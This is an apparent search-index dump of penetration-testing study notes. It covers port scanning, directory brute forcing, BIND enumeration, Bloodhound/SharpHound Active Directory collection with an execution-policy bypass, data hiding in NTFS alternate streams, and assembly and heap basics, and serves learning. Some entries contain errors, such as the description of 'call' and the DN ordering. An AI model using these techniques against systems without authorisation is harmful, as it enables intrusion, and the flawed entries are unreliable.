(AD) » Domain Data Enumeration with Bloodhound » Overview","id":"229","title":"Overview"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. 
It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"230","title":"Setup"},"231":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"231","title":"Collecting Data for Bloodhound"},"232":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"232","title":"Viewing the Data"},"233":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. 
Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"233","title":"Finding Relationships in the Data"},"234":{"body":"","breadcrumbs":"System Internals","id":"234","title":"System Internals"},"235":{"body":"","breadcrumbs":"System Internals » Linux","id":"235","title":"System Internals"},"236":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"236","title":"User ID"},"237":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"237","title":"Unified File System"},"238":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. 
Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"238","title":"Symbolic Links"},"239":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"239","title":"Hard Links"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible type of permissions - read (r), write (x) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. 
Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"240","title":"Permissions"},"241":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"241","title":"Set Owner User ID (SUID)"},"242":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way as SUID, but rather than the files executing with the privileges of the owning user, they execute with the effective GID of the owning group. When set on a directory, any file created within that directory will automatically have its group ownership set to the one specified by the directory. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"242","title":"Set Group ID (SGID)"},"243":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. 
It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"243","title":"Sticky Bit"},"244":{"body":"The command line is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"244","title":"Introduction"},"245":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. 2> err_file Redirect the command's standard error into err_file by overwriting it. 2>> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"245","title":"Input and Output Redirection"},"246":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"246","title":"Pipes"},"247":{"body":"","breadcrumbs":"System Internals » Windows","id":"247","title":"System Internals"},"248":{"body":"Active Directory (AD) is a directory service for Windows network environments. It allows an organisation to store directory data and make it available to the users in a given network. 
AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"248","title":"Introduction"},"249":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers. An object holding no other objects is known as a leaf.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"249","title":"Objects"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. 
It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"Objects are organised in logical groups called domains . These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"250","title":"Object Organisation"},"251":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. 
The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forwards slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"251","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"252":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. 
Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"252","title":"Trusts"},"253":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"253","title":"Introduction"},"254":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"254","title":"System Internals"},"255":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. 
These objects are instances of the User class. User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"255","title":"Introduction"},"256":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"256","title":"Domain Users"},"257":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"257","title":"Introduction"},"258":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. 
Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distribution groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"258","title":"Group Type"},"259":{"body":"There are three possible group scopes, and the scope must once again be selected upon creation of the group. The group scope determines the level of permissions that can be assigned via the group. Domain Local groups can only be used to manage permissions for resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups allow access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and local groups. Universal groups allow permissions management across all domains within the same forest. They are stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replications, administrators are advised to keep users and computers in global groups which are themselves stored in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not part of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. 
A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"259","title":"Group Scope"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes and cannot contain other groups - only users. Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. 
Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"260","title":"Default Groups"},"261":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is updated in the AD environment. These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. 
Relative ID (RID) Master Assignment of RIDs to other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, password changes, and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs between domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"261","title":"Introduction"},"262":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since full administrative access to a computer (NT AUTHORITY\\SYSTEM) grants privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"262","title":"Introduction"},"263":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another peculiar feature of NTFS is Alternate Data Streams.","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"263","title":"Introduction"},"264":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. 
The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"264","title":"Permissions"},"265":{"body":"Permissions can be inspected from the command line by running icacls The last set of () for each user/group tells you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"265","title":"Inspecting Permissions"},"266":{"body":"A not very well-known, yet interesting feature of NTFS is the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer which makes them an easy way to hide data within legitimate-looking files. Every file in NTFS has at least one default data stream where its data is stored. 
The default data stream is unnamed, and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"266","title":"Alternate Data Streams (ADS)"},"267":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command-line is needed. File operations with alternate data streams on the command-line work the same, but you will need to use the : format to refer to the stream you want to manipulate. For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams, comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"267","title":"Working with ADSs"},"268":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"268","title":"Reverse Engineering"},"269":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"269","title":"Program Anatomy"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster. The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. 
Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exist, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from common URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each process has access to its own stack which isn't bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. 
Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer diminishes, and when removing data, the stack pointer augments. This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"270","title":"The Stack"},"271":{"body":"When a function is invoked, a stack frame is constructed. First, the function's arguments which do not fit into the registers are pushed on the stack, then the return address is also pushed. Following this, the value of a special register known as the base pointer (rbp) is saved onto the stack and the value inside the register is then updated to point to the location on the stack where we saved the base pointer. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough at keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"271","title":"Stack Frames"},"272":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an operation code (opcode) and optional data that the instruction operates with. 
These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"272","title":"Instructions"},"273":{"body":"Moves the value inside one register to another: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"273","title":"mov"},"274":{"body":"Load effective address - this instruction calculates the address of its second operand and moves it into its first operand: lea rdx, [rax+0x10] This will move rax+0x10 inside rdx.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"274","title":"lea"},"275":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"275","title":"add"},"276":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand: sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"276","title":"sub"},"277":{"body":"It performs XOR-ing on its operands and stores the result in the first operand: xor rdx, rax The and and or instructions are the same, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"277","title":"xor"},"278":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"278","title":"push"},"279":{"body":"Increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes and stores the popped value from the stack into its operand: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"279","title":"pop"},"28":{"body":"The BIND software is the most commonly used name server software, which 
supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. Use the following syntax for querying BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"Jumps to the address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"280","title":"jmp"},"281":{"body":"Used for invoking procedures. It first pushes the values of the base and stack pointers onto the stack and then jumps to the specified address. 
Saving and restoring the base pointer is the job of the called function's prologue and epilogue (push rbp / mov rbp, rsp ... pop rbp), not of call itself. When the function is finished, a ret instruction pops the return address off the stack and continues execution from there - which is why overwriting that saved return address is the classic goal of a stack buffer overflow.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"281","title":"call"},"282":{"body":"It compares the values of its two operands by subtracting the second from the first, discarding the result and keeping only the flags: cmp rax, rdx Treating the operands as unsigned: If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0. The carry flag only describes unsigned order; signed conditional jumps such as jl and jg look at the sign and overflow flags instead, so after the same cmp, jb and jl can disagree whenever an operand has its top bit set.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"282","title":"cmp"},"283":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag. They are the same instructions as je and jne (jump-if-equal / jump-if-not-equal), which is the spelling most disassemblers show after a cmp.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"283","title":"jz / jnz"},"284":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to request and release each piece of heap memory exactly once. Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to mark the area as available for reuse by the allocator (and, for large mappings, for return to the operating system). Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"284","title":"The Heap"},"285":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. 
-> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and read beyond bounds vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double free vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities, which corrupt the chunk's own metadata. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and, where an attacker controls the offset added to the pointer, sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"285","title":"Heap Rules"},"286":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"286","title":"The GLIBC Heap"},"287":{"body":"The heap manager allocates resources in so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. In addition to this padding, each chunk contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. The following three bits carry specific meaning: A (0x04) - Non-main arena. 
